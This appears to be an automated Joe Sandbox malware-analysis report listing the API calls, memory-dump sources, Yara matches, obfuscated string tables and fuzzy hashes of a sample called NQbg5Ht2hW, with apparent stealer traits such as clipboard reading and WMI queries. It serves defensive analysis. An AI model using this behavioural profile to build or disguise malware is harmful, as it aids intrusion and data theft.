• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
• Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
• Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
• Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Control-flow Graph

control_flow_graph 212 40c550-40c580 CoInitializeEx
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
• Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Control-flow Graph
control_flow_graph 213 40c583-40c5b2 CoInitializeSecurity
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
• Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
• Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
• Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Control-flow Graph
control_flow_graph 215 43aaa0-43aaac 216 43aab3-43aabe call 43d810 RtlFreeHeap 215->216 217 43aac4-43aac5 215->217 216->217
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
• Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
• Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
• Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Control-flow Graph
control_flow_graph 220 43aa80-43aa97 call 43d810 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
• Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
• Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
• Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004704B6
Memory Dump Source
• Source File: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_470000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: a0bfb27cbe6de90053606688358b4ba16acdfac2ce2fc8a29e6b2121caff52c3
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 6F113F79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D375EA50DF84

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
• Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
• Instruction ID: 2c2e9393f8b6e7a29c7aef5acce024b931fee8c6e301267b84b10251681df76c
• Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
• Instruction Fuzzy Hash: 8313AA3150C7D08AD335CB3894583AFBBE1ABD6324F188A6DE4E9873C2D6798945CB53

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
• Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
• Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
• Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                                        • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                        • Instruction ID: b0b2b0922e896c1852a9a7658fd3c637e0830557781a94ec9c3c70e057942b68
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2D1BE2090C7D98EDB22C77C884879DBFA15F67324F1882D8D4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                                                                                                                                                                                                                                                        • API String ID: 0-168325148
                                                                                                                                                                                                                                                                        • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                        • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                                                                                                                                                                                                                                                        • API String ID: 0-3492884535
                                                                                                                                                                                                                                                                        • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                        • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                                        • API String ID: 2485776651-1397720406
                                                                                                                                                                                                                                                                        • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                                        • API String ID: 0-2608794092
                                                                                                                                                                                                                                                                        • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                        • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                                        • API String ID: 0-1300133108
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
• API String ID: 0-1893782281
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
• API String ID: 0-2118368390
APIs
• CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0074829B
• SysAllocString.OLEAUT32()"^), ref: 0074832A
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00748368
• SysAllocString.OLEAUT32()"^), ref: 007483E5
• SysAllocString.OLEAUT32()"^), ref: 0074849F
• VariantInit.OLEAUT32(C7C6C5CC), ref: 0074850F
• VariantClear.OLEAUT32(?), ref: 00748660
• SysFreeString.OLEAUT32(00000000), ref: 00748697
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
• String ID: P%R$)"^$.H4J$O@$pq
• API String ID: 2775254435-1397720406
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
• API String ID: 0-1763234448
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
• API String ID: 0-1826372655
                                                                                                                                                                                                                                                                        • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                        • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                                        • API String ID: 3664257935-479303636
                                                                                                                                                                                                                                                                        • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                        • Instruction ID: ba663aad37332a66c68e0ddfba4941604d43ac7fb8b33dbe2054f06152526d49
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CB26876648350AFE3208B95E88477BBBE2EBD5300F1CC82DE9D49B211D7799C458B93
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                          • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                                        • API String ID: 764372645-479303636
                                                                                                                                                                                                                                                                        • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                        • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                        • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                        • Instruction ID: 9da5d6d296f3bfee901d0d77cc5a16e87a8dcfd3bf90c75fd7b80ece23d6fa7e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3D1477264D7549BC324CF28C8516ABBBE2EFC1304F1D896DE4D58B385D639C94ACB82
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                                        • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                        • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
